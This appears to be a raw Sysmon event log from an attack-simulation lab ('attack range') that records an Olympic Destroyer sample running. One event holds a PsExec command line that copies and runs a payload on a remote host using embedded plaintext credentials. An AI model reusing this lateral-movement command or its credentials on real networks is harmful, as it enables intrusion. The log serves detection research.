11:12:09.595{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000296597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:12:09.579{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000296596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.511{C8EA50B7-F11F-6215-1000-000000003802}3646220C:\Windows\system32\svchost.exe{C8EA50B7-1689-6216-0007-000000003802}6300C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.511{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1689-6216-0007-000000003802}6300C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.479{C8EA50B7-1689-6216-0007-000000003802}63006276C:\Windows\system32\conhost.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.411{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1689-6216-0007-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.379{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1689-6216-0007-000000003802}6300C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.357{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.357{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.357{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.295{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.295{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.295{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.257{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.257{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.257{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.257{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.244{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "VULT\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.242{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1689-6216-FF06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000296573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.195{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A438B4A1ABBD2CF12177D211C23F8EA,SHA256=84C613088A5ACD07C624441F2BADEFF035940C413562E0AF38721F73E6EB11B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:09.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=020C1A4741DD25BA811F361C75F4B5E6,SHA256=C964A34204D3FBEC10C58535908DB0431D54D03923E2BA46EFBE3C86E5B589E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:10.243{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E135AE6D98F3A31BBA5CFF457C5E1301,SHA256=62692573390C76C131AE3A44131CFDB794F5441EC81B0C5173E87BBD993B3C26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:10.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=171C346C0E3AD450ABA75F4E4B220B9A,SHA256=548747028DA84043EE204AEA40CDF334BA1C55E527FB88C3E51926D0FAB78425,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:10.680{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D1548FA36E2B9DE2F392314EEF342D51,SHA256=7C20286B730422F61514CE5F8583C3E8F23EF4F5FBF5209C9DE51C7BA2328220,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:10.212{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE407DDB800D798E2165C23C22648AF9,SHA256=F5CE4E8049A9839572D672BC94E079507B0E98E5525D13E6CEE305C6C8779ECD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:11.289{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8FD10220E31AFAC67472E9239C66622,SHA256=BA00174A4BE23B865D48A9748E1C533399A082EAA870DB5F3424B2594EF6E5AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:11.230{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB6E2608408AA0017BC3A325B34D973,SHA256=4DA65674B4C31FFA4E9835CA9274A9BBC7C1DCCD41EE157D1D026DD117C99898,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:09.082{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local52264- 23542300x8000000000000000220603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:12.446{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB6348384DF6FB4D60533836E2CA9847,SHA256=D3F06BFCCC74E12A6B87376C5B350BB30E966CF24E2AD9CEC88D93FDE9C1BD80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:12.231{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A847713A549886B705F0D561BDC4F70E,SHA256=E1E1B6D96A4AC1E13B36BD8DE99415918304317FD5C2188EA2CD7736565F618D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:09.490{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51593-false10.0.1.12-8000- 354300x8000000000000000296606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:10.206{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT 